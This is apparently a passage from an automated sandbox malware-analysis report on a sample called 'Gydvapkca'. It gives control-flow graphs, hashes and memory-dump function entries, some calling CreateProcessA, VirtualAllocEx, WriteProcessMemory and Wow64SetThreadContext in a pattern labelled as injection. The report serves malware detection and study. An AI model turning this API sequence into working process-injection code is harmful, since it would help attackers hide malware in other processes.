                          control_flow_graph 634 221e610-221e638 636 221e724-221e749 634->636 637 221e63e-221e642 634->637 644 221e750-221e774 636->644 638 221e644-221e650 637->638 639 221e656-221e65a 637->639 638->639 638->644 640 221e660-221e677 639->640 641 221e77b-221e7a0 639->641 652 221e679-221e685 640->652 653 221e68b-221e68f 640->653 663 221e7a7-221e7fa 641->663 644->641 652->653 652->663 654 221e691-221e6aa call 22101e4 653->654 655 221e6bb-221e6d4 653->655 654->655 667 221e6ac-221e6af 654->667 668 221e6d6-221e6fa 655->668 669 221e6fd-221e721 655->669 677 221e832-221e857 663->677 678 221e7fc-221e81c 663->678 672 221e6b8 667->672 672->655 685 221e85e-221e8b2 677->685 678->685 686 221e81e-221e82f 678->686 692 221e959-221e9a7 685->692 693 221e8b8-221e8c4 685->693 705 221e9d7-221e9dd 692->705 706 221e9a9-221e9cd 692->706 696 221e8c6-221e8cd 693->696 697 221e8ce-221e8e2 693->697 700 221e951-221e958 697->700 701 221e8e4-221e909 697->701 712 221e90b-221e925 701->712 713 221e94c-221e94f 701->713 708 221e9ef-221e9fe 705->708 709 221e9df-221e9ec 705->709 706->705 707 221e9cf 706->707 707->705 712->713 715 221e927-221e930 712->715 713->700 713->701 716 221e932-221e935 715->716 717 221e93f-221e94b 715->717 716->717
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$(iq$(iq$(iq
                          • API String ID: 0-3102978658
                          • Opcode ID: 8013861e25baed894e86fef2de1d32b329ce3a46a104816b4cccbae949112003
                          • Instruction ID: 2c9b8a5a8bb8f9c1858d90838842c1618c762630f5a64303a409b05fb1f5e815
                          • Opcode Fuzzy Hash: 8013861e25baed894e86fef2de1d32b329ce3a46a104816b4cccbae949112003
                          • Instruction Fuzzy Hash: C3B120327146558FDB14DF68D840AAE3BE6EFC4310B1980AAE905CB396CF35DC46CBA0
                          Function 059003B8 Relevance: 4.0, Strings: 2, Instructions: 1517COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 711c8356802337eeaab9937d5d3d0e61f6580721d507118cd0ff49e8a99b7a5f
                          • Instruction ID: ddcd491c077dd419a9de9607e58728b785a6982c780a0675615ce099671c38ac
                          • Opcode Fuzzy Hash: 711c8356802337eeaab9937d5d3d0e61f6580721d507118cd0ff49e8a99b7a5f
                          • Instruction Fuzzy Hash: 69D2AB74909348DFDB16CBA4CD99BAE7FB5FF06300F1494AAE101AB2E2C7785845CB61
                          Function 059018C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2139 59018c0-59018e8 2141 59018ea 2139->2141 2142 59018ef-5901918 2139->2142 2141->2142 2143 5901939 2142->2143 2144 590191a-5901923 2142->2144 2147 590193c-5901940 2143->2147 2145 5901925-5901928 2144->2145 2146 590192a-590192d 2144->2146 2148 5901937 2145->2148 2146->2148 2149 5901cf7-5901d0e 2147->2149 2148->2147 2151 5901d14-5901d18 2149->2151 2152 5901945-5901949 2149->2152 2153 5901d1a-5901d4a 2151->2153 2154 5901d4d-5901d51 2151->2154 2155 590194b-59019a8 2152->2155 2156 590194e-5901952 2152->2156 2153->2154 2160 5901d72 2154->2160 2161 5901d53-5901d5c 2154->2161 2166 59019aa-5901a1b 2155->2166 2167 59019ad-59019b1 2155->2167 2158 5901954-5901978 2156->2158 2159 590197b-590199f 2156->2159 2158->2159 2159->2149 2163 5901d75-5901d7b 2160->2163 2164 5901d63-5901d66 2161->2164 2165 5901d5e-5901d61 2161->2165 2171 5901d70 2164->2171 2165->2171 2174 5901a20-5901a24 2166->2174 2175 5901a1d-5901a7a 2166->2175 2168 59019b3-59019d7 2167->2168 2169 59019da-5901a01 2167->2169 2168->2169 2195 5901a11-5901a12 2169->2195 2196 5901a03-5901a09 2169->2196 2171->2163 2178 5901a26-5901a4a 2174->2178 2179 5901a4d-5901a71 2174->2179 2185 5901a7c-5901ad8 2175->2185 2186 5901a7f-5901a83 2175->2186 2178->2179 2179->2149 2197 5901ada-5901b3c 2185->2197 2198 5901add-5901ae1 2185->2198 2188 5901a85-5901aa9 2186->2188 2189 5901aac-5901acf 2186->2189 2188->2189 2189->2149 2195->2149 2196->2195 2207 5901b41-5901b45 2197->2207 2208 5901b3e-5901ba0 2197->2208 2199 5901ae3-5901b07 2198->2199 2200 5901b0a-5901b0d 2198->2200 2199->2200 2214 5901b15-5901b22 2200->2214 2209 5901b47-5901b6b 2207->2209 2210 5901b6e-5901b86 2207->2210 2219 5901ba2-5901c04 2208->2219 2220 5901ba5-5901ba9 2208->2220 2209->2210 2228 5901b96-5901b97 2210->2228 2229 5901b88-5901b8e 2210->2229 2217 5901b32-5901b33 2214->2217 2218 5901b24-5901b2a 2214->2218 2217->2149 2218->2217 2230 5901c06-5901c68 2219->2230 2231 5901c09-5901c0d 2219->2231 2221 5901bd2-5901bea 2220->2221 2222 5901bab-5901bcf 2220->2222 2239 5901bfa-5901bfb 2221->2239 2240 5901bec-5901bf2 2221->2240 2222->2221 2228->2149 2229->2228 2241 5901c6a-5901cc3 2230->2241 2242 5901c6d-5901c71 2230->2242 2232 5901c36-5901c4e 2231->2232 2233 5901c0f-5901c33 2231->2233 2250 5901c50-5901c56 2232->2250 2251 5901c5e-5901c5f 2232->2251 2233->2232 2239->2149 2240->2239 2252 5901cc5-5901ce9 2241->2252 2253 5901cec-5901cef 2241->2253 2243 5901c73-5901c97 2242->2243 2244 5901c9a-5901cbd 2242->2244 2243->2244 2244->2149 2250->2251 2251->2149 2252->2253 2253->2149
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 28ed314c29c975a4a0d65ac07b46c9d728007181ae91658ad8068e87c3d2853e
                          • Instruction ID: f93fd73beec23ba9eaf015dd0831af8265c85928d786a614eb753cf533324522
                          • Opcode Fuzzy Hash: 28ed314c29c975a4a0d65ac07b46c9d728007181ae91658ad8068e87c3d2853e
                          • Instruction Fuzzy Hash: B2F1E534E05218DFCF18DFA4E9886ADBBB6FF89311F20592AE406A7390DB355981DF50
                          Function 05DD7A60 Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: a$l
                          • API String ID: 0-62436560
                          • Opcode ID: 59710495980417b77053548cd7b290871c4ddc1afae7c3d8b9048e2ba22ceef6
                          • Instruction ID: 39c543fb6a129c1c34c67f73bf20e416579c0363e46fc56129627bd590191655
                          • Opcode Fuzzy Hash: 59710495980417b77053548cd7b290871c4ddc1afae7c3d8b9048e2ba22ceef6
                          • Instruction Fuzzy Hash: D711D774A00229CFCB64EF58DC89B9DBBB2EB88309F1144E5D419A3340DB359EC99F11
                          Function 05900858 Relevance: 1.8, Strings: 1, Instructions: 548COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 81be05c7b6e132e55a9777cd20684786820807044dea44f5aeb46fee7b761d2e
                          • Instruction ID: 9c9cf2c9279618a9aa040d54106de6561fd722767d5f545ba6c9a76cd406a503
                          • Opcode Fuzzy Hash: 81be05c7b6e132e55a9777cd20684786820807044dea44f5aeb46fee7b761d2e
                          • Instruction Fuzzy Hash: 9212E6B594E3889FD7168B78CD59BAA3FB4AF13300F1944EAE144DB2E2C6785844CB71
                          Function 05A91D94 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A92007
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 151352da26dbc191e6d5d6eabf0144b5d3edf2d29834a4a029c2218281662b12
                          • Instruction ID: 44802ea5eb4cd8e0910947af10f0bb280a0bf0bd9422a6db80aa2d965f685906
                          • Opcode Fuzzy Hash: 151352da26dbc191e6d5d6eabf0144b5d3edf2d29834a4a029c2218281662b12
                          • Instruction Fuzzy Hash: EAA1F174D002299FDF24CFA9C885BEEBBF1BF09310F14916AE859A7280DB748985CF51
                          Function 05A91DA0 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A92007
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 734f0114f01e6d1a09969e3fd9da370a4e38ca94aa743926de5e40c1711663f5
                          • Instruction ID: 9f2286c7272f9b4733031fc468ec193c10c95d98b1dbbd3461a9e2aa0276dc76
                          • Opcode Fuzzy Hash: 734f0114f01e6d1a09969e3fd9da370a4e38ca94aa743926de5e40c1711663f5
                          • Instruction Fuzzy Hash: 08A10174D002299FDF24CFA9C885BEEBBF1BF09310F14916AE859A7240DB748985CF41
                          Function 05A92818 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A928EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 6449470c0b8ace70ad888cb25d8d746737433420e15b62ddf7b1d32dac750fcf
                          • Instruction ID: 39774ea9a9b51ae9e350ea031b8d4d0ce20d95b61c1b331c319f01b86193c675
                          • Opcode Fuzzy Hash: 6449470c0b8ace70ad888cb25d8d746737433420e15b62ddf7b1d32dac750fcf
                          • Instruction Fuzzy Hash: C54199B9D012589FCF04CFA9D984AEEFBF1BF49310F14902AE819B7250D735AA45CB64
                          Function 05A92811 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A928EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: a542ccf7058a2ec0c44b4569fabd1660dc78976078f4b5d70b57275244f33d3d
                          • Instruction ID: f25b7945454a331132cde65de8a236a5cd6639f037e23f687e400b8942f70dd2
                          • Opcode Fuzzy Hash: a542ccf7058a2ec0c44b4569fabd1660dc78976078f4b5d70b57275244f33d3d
                          • Instruction Fuzzy Hash: 924199B9D002589FCF04CFA9D984AEEBBF1BF49310F24942AE819B7250D735AA45CF54
                          Function 05A926B8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A92762
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e7753eec5489c575ecda6ed9942a3f73807bad364edd8a14bb6cd24167478edf
                          • Instruction ID: 604ab31828adfbae568ee805471b7f44c2ff79f416ef9f482b4ef62f5900dd54
                          • Opcode Fuzzy Hash: e7753eec5489c575ecda6ed9942a3f73807bad364edd8a14bb6cd24167478edf
                          • Instruction Fuzzy Hash: EB3195B9D002589FCF14CFA9D980A9EFBB5FF59320F10A42AE815B7210D735A945CF64
                          Function 05A92D00 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A92DAC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 48dbfbf6f7819809b44119c8799d0a61ed62d9c12eb8071bf45ab156740e4054
                          • Instruction ID: 5059eaa5908f7987690a90fc09672648562f360dc18218bb43daaa969a20d9e3
                          • Opcode Fuzzy Hash: 48dbfbf6f7819809b44119c8799d0a61ed62d9c12eb8071bf45ab156740e4054
                          • Instruction Fuzzy Hash: 5B31D9B8D042589FCF14CFA9D884AEEFBF1AF49320F14902AE815B7200D739A945CF64
                          Function 05A926B0 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A92762
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7c85f14e737dffb10723a9f247f2713a778f076d938fd95cc6d60c116978fa09
                          • Instruction ID: 79a06dfe0ea523cd972ca1b7c9ed30f62fc4242abc5916bea8471b680588c01d
                          • Opcode Fuzzy Hash: 7c85f14e737dffb10723a9f247f2713a778f076d938fd95cc6d60c116978fa09
                          • Instruction Fuzzy Hash: BE3195B9D00258DFCF14CFA9D980AAEBBB1BF59320F14A42AE815B7210D735A945CF58
                          Function 05A92D08 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A92DAC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 9ed1c164f06b6a696247fbf497f94ffad27d1e767c12d2ba0d8488010b6ae993
                          • Instruction ID: d70c27d41957ce6ea0592b29d02fd1415678a373fb466a17355c7bca54d6ecda
                          • Opcode Fuzzy Hash: 9ed1c164f06b6a696247fbf497f94ffad27d1e767c12d2ba0d8488010b6ae993
                          • Instruction Fuzzy Hash: EF31B8B9D042589FCF14CFAAD984AEEFBF1AF49320F14902AE815B7210D735A945CF64
                          Function 05B6DAD0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B6DB74
                          Memory Dump Source
                          • Source File: 00000003.00000002.2255252953.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 8624a9453163f14d5dad7c6e6171494bd419d1daefcab776dd8b72a0fef2dede
                          • Instruction ID: 330dcf65cd6cee8fcb45b51c0e9b389bb693189d5c51657fd1a205710f8ade2b
                          • Opcode Fuzzy Hash: 8624a9453163f14d5dad7c6e6171494bd419d1daefcab776dd8b72a0fef2dede
                          • Instruction Fuzzy Hash: B431A7B9E002089FCF10CFA9D980A9EFBB1FF49320F14942AE815B7210D735A945CF54
                          Function 05A92158 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A92207
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 575436f17fe486dfada9aad28f1165e6bf1397287f55927f1fc2bdcb1f3f10df
                          • Instruction ID: f2ec30b8b40f4aa3fc4ca6db6f512c316417b265fe216e92cd2622cdf577f5e8
                          • Opcode Fuzzy Hash: 575436f17fe486dfada9aad28f1165e6bf1397287f55927f1fc2bdcb1f3f10df
                          • Instruction Fuzzy Hash: 1D319BB5D012589FCB14CFAAD984AEEFBF1BF49310F24802AE419B7240D779A985CF54
                          Function 05A92150 Relevance: 1.6, APIs: 1, Instructions: 93threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A92207
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 4749cba5f279d1f50632a31bf296c88e8d17abaecd628ef30edbba9bab68d92e
                          • Instruction ID: 12bd5135c17225f1dc7d6f1cbf6ffd7c2e63959d42eb38a47f5114893a4cebec
                          • Opcode Fuzzy Hash: 4749cba5f279d1f50632a31bf296c88e8d17abaecd628ef30edbba9bab68d92e
                          • Instruction Fuzzy Hash: 2241A9B9D00258DFDB14CFA9D984AAEFBF1BF48310F24802AE419B7250D778A985CF54
                          Function 05900AA8 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 628f92b7979f5c545d92a26b248b60fbb762ec6f094429405697863331a837b6
                          • Instruction ID: 8584eacf46d518df107112f1c00066b826378099fcf1daacde78cba7cb71d3b5
                          • Opcode Fuzzy Hash: 628f92b7979f5c545d92a26b248b60fbb762ec6f094429405697863331a837b6
                          • Instruction Fuzzy Hash: 13C116B590A388DFD716CB78CD59BAE3FB4AF13300F1944A6E144EB2E2C6785845CB61
                          Function 02210A47 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 29399a8bca181ac56a24bf9074e2225f99903d11d6133d393163609f80a2e093
                          • Instruction ID: 044f47b7392c14645486d442e9b2fef1afc553f3072f581cc361da05a48882ac
                          • Opcode Fuzzy Hash: 29399a8bca181ac56a24bf9074e2225f99903d11d6133d393163609f80a2e093
                          • Instruction Fuzzy Hash: 505137B8E5020A9FDF04CFA9D980AEEBBF1BF88310F10A559D405EB255DB319A45CF50
                          Function 022107D8 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: f3dc308a8c11be711e404029756663fa6ec3b69ae0472858778089e63af5202d
                          • Instruction ID: 83cd440fef5c6b7d0358abb5c2eea2aa4a07f472beed4aab5bc191955d21b2fb
                          • Opcode Fuzzy Hash: f3dc308a8c11be711e404029756663fa6ec3b69ae0472858778089e63af5202d
                          • Instruction Fuzzy Hash: 54519E719092958FDB02CF68C894A99BFF1EF5A310B0A81C6D441EF2A7D7348D85CB91
                          Function 02210868 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: b027466e0a152cfa8724a3ffd025d7237c20bd9ff6702c65ea5d3a2a50c2b997
                          • Instruction ID: 4762c25997a2e334556037423df67cb6bc1d6c9ff1635271ff11bc33a9bc20cf
                          • Opcode Fuzzy Hash: b027466e0a152cfa8724a3ffd025d7237c20bd9ff6702c65ea5d3a2a50c2b997
                          • Instruction Fuzzy Hash: 6D411775A101088FDB04DFA9C484AAEBBF6FF88710F1584A5E905EB365D734ED81CBA0
                          Function 05DEFD38 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: f7848bfcfd4515447417ecf2180522f002fe0485bf35a5502204ba1931580f98
                          • Instruction ID: 26e0bd388fcd4e482e8d96bfd82ad22e54f416c8a3c1a80c6efba061149ca7f5
                          • Opcode Fuzzy Hash: f7848bfcfd4515447417ecf2180522f002fe0485bf35a5502204ba1931580f98
                          • Instruction Fuzzy Hash: E8313D753006109FD308EB68C495B2A77E6EFC8704F214469E60ACB3A6DE71EC4187A1
                          Function 05B6EC98 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05B6ED37
                          Memory Dump Source
                          • Source File: 00000003.00000002.2255252953.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 51aea677ff537a8172f6bba1856ea165b71475ffeabdf304a12eb7a7ccd20a74
                          • Instruction ID: 04afa670579133d02e0ccbfaac09d092563221a3a6f79d5cf127bf453cc352f3
                          • Opcode Fuzzy Hash: 51aea677ff537a8172f6bba1856ea165b71475ffeabdf304a12eb7a7ccd20a74
                          • Instruction Fuzzy Hash: B531A7B9D002189FCF10CFA9D880A9EFBB5EF49320F14942AE815B7210DB35A945CF94
                          Function 02210857 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: 44021341f1910d8264634d9e308377d52b451ee41e818b200cef99cc6a47c525
                          • Instruction ID: d4dba2c1a297ae83da419ad8de9230cb3b3af8347500e7805655368e71b29758
                          • Opcode Fuzzy Hash: 44021341f1910d8264634d9e308377d52b451ee41e818b200cef99cc6a47c525
                          • Instruction Fuzzy Hash: 1F31D175A002098FDB04CFA9C584AADBBF2FF58310F258495D845EB266D735ED82CFA0
                          Function 0221EEE0 Relevance: .2, Instructions: 208COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2183c01797ad514d044d53f0e2ee62cd2a804faf1cce86e8a2c73f3c693ea6ea
                          • Instruction ID: 5bdde0cd8e9ec880190a4910d2986a81b3a8fb6dd5c2c69a4b6f6e958015f6f9
                          • Opcode Fuzzy Hash: 2183c01797ad514d044d53f0e2ee62cd2a804faf1cce86e8a2c73f3c693ea6ea
                          • Instruction Fuzzy Hash: 07812775A10619CFCB14DFA8C584E9EBBF5FF98310B1580A9E8169B364DB31ED42CB90
                          Function 02218C98 Relevance: .2, Instructions: 160COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2a66f68a8c5d33dd5523782382f64eb8e7eb54688066034dc894da07f981764
                          • Instruction ID: 55fe083542e955d78df442bf6617a9f37b45476f94df30eefe496148cb0b1724
                          • Opcode Fuzzy Hash: b2a66f68a8c5d33dd5523782382f64eb8e7eb54688066034dc894da07f981764
                          • Instruction Fuzzy Hash: EE5127B1D19245CFE706DBA8C8C4B997FF1EF66308F0984E6D4409B256D7784808CF56
                          Function 05DEEE38 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a68a82de32fae2ceedbbf9e208d3f3a5f1b7e30b213bbd0b35ecd581cd31199
                          • Instruction ID: 7fc141f4725c568a890bbe04ba01da36f5b020080eba6ce24075002a7e53625c
                          • Opcode Fuzzy Hash: 2a68a82de32fae2ceedbbf9e208d3f3a5f1b7e30b213bbd0b35ecd581cd31199
                          • Instruction Fuzzy Hash: 083106366001149FCB05DF58D888EA9BBB6FF48720F1680A9F5099B372C731EC55CB80
                          Function 02218DAD Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 620e486b159b3195a887aa9c6e8d621474363a8b90f2f113ba1bd0d9a2a97632
                          • Instruction ID: ff04db28ed2cb8bc2ae68166b1849f2d76e9fe82f0af41b7e32cb969308f0e23
